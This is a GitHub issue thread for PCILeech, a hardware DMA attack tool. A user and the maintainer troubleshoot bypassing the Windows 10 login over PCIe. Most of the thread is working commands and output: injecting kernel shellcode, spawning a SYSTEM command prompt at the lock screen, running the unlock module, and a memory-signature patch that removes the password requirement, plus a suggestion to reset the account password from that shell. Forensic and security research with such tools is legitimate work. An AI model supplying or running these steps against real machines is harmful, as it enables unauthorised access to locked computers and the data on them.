Unable to unlock Windows 10 x64 17763 using AC701/FT601

[forense54]

Attacker System: Windows 10 x64 18363 connected to FT601 with USB3.0 cable Target System: Windows 10 x64 17763 connected to AC701 using PCIe 4x

PCILeech version: PCILeech_files_and_binaries_v4.5-20200804-2 AC701 flashed with prebuilt 4.5 fd1982b1e8e2da48b0fa75ffb196eb41ac45c13dbb25f7547bb084c4c152f4f7 (4.6 does not connect to PCIe, the LED GPIOs do not blink)

The shellcode injection and the wx64_pscmd work correctly in the login screen:

C:\Users\user\Desktop\PCILeech_files_and_binaries_v4.5-20200804-2>pcileech.exe -device fpga:// wx64_pscmd -kmd WIN10_X64_2

KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
EXEC: SUCCESS! shellcode should now execute in kernel!
Please see below for results.

PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE ON TARGET!
Automatically spawn a CMD.EXE on the target system. This utility
only work if the target system is locked and the login screen is
visible. If it takes time waiting - then please touch any key on
the target system.   If the utility fails multiple times, please
try wx64_pscreate instead.
DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT
NTSTATUS        : 0x00000000
ADDITIONAL INFO : 0x0000
Microsoft Windows [Versión 10.0.17763.1]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.

C:\WINDOWS\system32>

But, both ways to unlock Windows are not working:

C:\Users\user\Desktop\PCILeech_files_and_binaries_v4.5-20200804-2>pcileech.exe -device fpga:// kmdload -kmd WIN10_X64_2

KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
KMD: Successfully loaded at address: 0x7fffc000

C:\Users\user\Desktop\PCILeech_files_and_binaries_v4.5-20200804-2>pcileech.exe -device fpga:// wx64_unlock -kmd 0x7fffc000 -0 1

EXEC: SUCCESS! shellcode should now execute in kernel!
Please see below for results.

WINDOWS UNLOCKER - REMOVE PASSWORD REQUIREMENT!
REQUIRED OPTIONS:
  -0   : Set to one (1) in order to unlock.
         Example: '-0 1'.
 RESULT AFTER UNLOCK ATTEMPT (0=SUCCESS) 
NTSTATUS        : **0x80004005**

C:\Users\user\Desktop\PCILeech_files_and_binaries_v4.5-20200804-2>pcileech.exe -device fpga:// patch -kmd 0x7fffc000 -pt -sig unlock_win10x64

 Current Action: Patching
 Access Mode:    KMD (kernel module assisted DMA)
 Progress:       17375 / 17376 (99%)
 Speed:          31 MB/s
 Address:        0x000000043DFFF000
 Pages read:     4161334 / 4448256 (93%)
 Pages failed:   286921 (6%)
Patch: Failed. No signature found.

Has anyone found this issue? Thanks

[ufrisk]

The issue is that the signatures I use to search for the location to patch have changed and needs to be updated.

I plan to look into this later in September. Please understand that PCILeech is a hobby project of mine. Not many people are sponsoring here on Github and I receive absolutely zero from hardware sales. As such my time I'm able to put into the project is a bit limited - hence the currently outdated signatures.

Meanwhile as a workaround you may do in the system shell: net user <username> <new_password> - but that will change the password of the user unfortunately. I'll update this issue once I have released new signatures.

[forense54]

Thank you for your answer and your work @ufrisk! I'll look forward to the signatures update.

[ufrisk]

I did a major refresh of the windows unlock signatures just now. Can you please check if the latest release package resolves your issue?

[forense54]

Thanks for the update! Unfortunately, the issue persists.

Using compiled pcileech from master (using Visual Studio 2019 in Release/x64 mode and MemProcFS and LeechCore from master branch) the kmd load is not working:

C:\Users\User\Desktop\pcileech-master\pcileech-master\files>pcileech.exe --device fpga:// wx64_unlock -kmd WIN10_X64_2 -0 1

Device Info: FPGA: Bad PCIe TLP received! Should not happen!
KMD: Failed locating function hook pointer.
PCILEECH: Failed to load kernel module.

C:\Users\User\Desktop\pcileech-master\pcileech-master\files>pcileech.exe --device fpga:// wx64_unlock -kmd WIN10_X64 -0 1

KMD: Failed. Failed finding entry point.
PCILEECH: Failed to load kernel module.

C:\Users\User\Desktop\pcileech-master\pcileech-master\files>pcileech.exe --device fpga:// kmdload -kmd WIN10_X64

KMD: Failed. Failed finding entry point.
PCILEECH: Failed to load kernel module.

I tried replacing unlock_win10x64.sig and wx64_unlock.ksh from master compiled version into the prebuilt version and still getting the error code "0x80004005"

C:\Users\User\Desktop\PCILeech_files_and_binaries_v4.5-20200804\PCILeech_files_and_binaries_v4.5-20200804-2>pcileech.exe --device fpga:// wx64_pscmd -kmd WIN10_X64_2

Device Info: FPGA: Bad PCIe TLP received! Should not happen!
Device Info: FPGA: Bad PCIe TLP received! Should not happen!
KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
EXEC: SUCCESS! shellcode should now execute in kernel!
Please see below for results.

PROCESS CREATOR - AUTOMATICALLY SPAWN CMD.EXE ON TARGET!
================================================================
Automatically spawn a CMD.EXE on the target system. This utility
only work if the target system is locked and the login screen is
visible. If it takes time waiting - then please touch any key on
the target system.   If the utility fails multiple times, please
try wx64_pscreate instead.
===== DETAILED INFORMATION AFTER PROCESS CREATION ATTEMPT ======
NTSTATUS        : 0x00000000
ADDITIONAL INFO : 0x0000
================================================================
Microsoft Windows [Versión 10.0.17763.1]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.

C:\WINDOWS\system32>

C:\Users\User\Desktop\PCILeech_files_and_binaries_v4.5-20200804\PCILeech_files_and_binaries_v4.5-20200804-2>pcileech.exe --device fpga:// wx64_unlock -kmd WIN10_X64_2 -0 1

Device Info: FPGA: Bad PCIe TLP received! Should not happen!
KMD: Code inserted into the kernel - Waiting to receive execution.
KMD: Execution received - continuing ...
EXEC: SUCCESS! shellcode should now execute in kernel!
Please see below for results.

WINDOWS UNLOCKER - REMOVE PASSWORD REQUIREMENT!
===============================================================
REQUIRED OPTIONS:
  -0   : Set to one (1) in order to unlock.
         Example: '-0 1'.
===== RESULT AFTER UNLOCK ATTEMPT (0=SUCCESS) =================
NTSTATUS        : 0x80004005
===============================================================

KMD: Hopefully unloaded.

[ufrisk]

I updated the PCILeech release yesterday. You would need to download the new binaries for it to work. I see you use the old binaries.

The new ones with the new signature is named: PCILeech_files_and_binaries_v4.6-20200830.zip. If this is still not working due to the NTSTATUS : 0x80004005 can you please check the version number of c:\windows\system32\ntlmshared.dll differs from the one in the screenshot. If it does can you please share it with me?

also, you may try the patch command - i.e.: pcileech.exe patch -sig unlock_win10x64 -all (no kernel module required)

[forense54]

Thanks again @ufrisk !

The patch method unlocks the PC, so the new signatures are working:

C:\Users\User\Desktop\PCILeech_files_and_binaries_v4.6-20200830>pcileech patch -sig unlock_win10x64 -all

 Current Action: Patching
 Access Mode:    Normal
 Progress:       17376 / 17376 (100%)
 Speed:          139 MB/s
 Address:        0x000000043E000000
 Pages read:     4177568 / 4448256 (93%)
 Pages failed:   270688 (6%)
Patch: Successful. Location: 0x40c117749

But this new version cannot load kernel modules (same behavior as the master compiled version from yesterday as reported in #151 , but in this case the target device is W10 X64 17763) :

C:\Users\User\Desktop\PCILeech_files_and_binaries_v4.6-20200830>pcileech.exe wx64_unlock -kmd WIN10_X64 -0 1

KMD: Failed locating function hook pointer.
PCILEECH: Failed to load kernel module.

C:\Users\User\Desktop\PCILeech_files_and_binaries_v4.6-20200830>pcileech.exe wx64_unlock -kmd WIN10_X64_2 -0 1

KMD: Failed. Failed finding entry point.
PCILEECH: Failed to load kernel module.

[ufrisk]

Thanks, I now see I messed up the kernel inject in the last update. I'll release a new version and fix this later this week. Will let you know when it's done.

[ufrisk]

Published a tiny bug fix. Is the pcileech.exe -device fpga:// kmdload -kmd WIN10_X64_2 command working better now?

[forense54]

Yes, it works perfectly. Thanks a lot!

[ufrisk]

Awesome! Thank you for reporting and also confirming it now works. Please let me know if you should run into anything more in the future. Since the issue is resolved I'm closing it.

---

Also, if you should find PCILeech / MemProcFS useful please consider sponsoring the project here on Github. I see people purchasing hardware for hundreds of dollars (of which I receive absolutely zero dollars of) just to be able to run my free open source software. Sponsorships go for as little as $2 and Github is matching it - a $2 sponsorship for you is a $4 sponsorship for me. Thank You 💖